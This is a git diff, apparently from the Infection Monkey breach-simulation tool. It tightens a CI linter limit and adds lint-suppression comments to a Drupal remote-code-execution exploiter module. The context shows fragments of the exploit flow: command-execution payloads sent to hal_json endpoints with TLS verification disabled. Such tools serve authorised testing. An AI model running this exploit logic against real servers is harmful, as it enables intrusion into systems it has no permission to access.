diff --git a/.travis.yml b/.travis.yml
index fcd9fc36b..fc079ea76 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -72,7 +72,7 @@ script:
 
 ## Display the linter issues
 - cat flake8_warnings.txt
 ## Make sure that we haven't increased the amount of warnings.
-- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=90
+- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=80
 - if [ $(tail -n 1 flake8_warnings.txt) -gt $PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many python linter warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi
 ## Check import order
diff --git a/monkey/infection_monkey/exploit/drupal.py b/monkey/infection_monkey/exploit/drupal.py
index 3a333d827..84919baef 100644
--- a/monkey/infection_monkey/exploit/drupal.py
+++ b/monkey/infection_monkey/exploit/drupal.py
@@ -21,7 +21,6 @@ LOG = logging.getLogger(__name__)
 class DrupalExploiter(WebRCE):
     _TARGET_OS_TYPE = ['linux', 'windows']
     _EXPLOITED_SERVICE = 'Drupal Server'
-    DRUPAL_PORTS = [[80, False], [443, True]]
 
     def __init__(self, host):
         super(DrupalExploiter, self).__init__(host)
@@ -73,7 +72,7 @@ class DrupalExploiter(WebRCE):
         """
         payload = build_exploitability_check_payload(url)
 
-        response = requests.get(f'{url}?_format=hal_json',
+        response = requests.get(f'{url}?_format=hal_json',  # noqa: DUO123
                                 json=payload,
                                 headers={"Content-Type": "application/hal+json"},
                                 verify=False)
@@ -90,11 +89,11 @@ class DrupalExploiter(WebRCE):
         base = remove_port(url)
         payload = build_cmd_execution_payload(base, cmd)
 
-        r = requests.get(f'{url}?_format=hal_json',
+        r = requests.get(f'{url}?_format=hal_json',  # noqa: DUO123
                          json=payload,
                          headers={"Content-Type": "application/hal+json"},
                          verify=False)
-
+
         if is_response_cached(r):
             LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
 
@@ -111,7 +110,7 @@ class DrupalExploiter(WebRCE):
         :return: vulnerable URL to exploit
         """
         return self.vulnerable_urls.pop()
-
+
     def are_vulnerable_urls_sufficient(self):
         """
         For the Drupal exploit, 5 distinct URLs are needed to perform the full attack.
@@ -137,7 +136,7 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
     articles = set()
     while lower < upper:
         node_url = urljoin(base_url, str(lower))
-        response = requests.get(node_url, verify=False)
+        response = requests.get(node_url, verify=False)  # noqa: DUO123
         if response.status_code == 200:
             if is_response_cached(response):
                 LOG.info(f'Found a cached article at: {node_url}, skipping')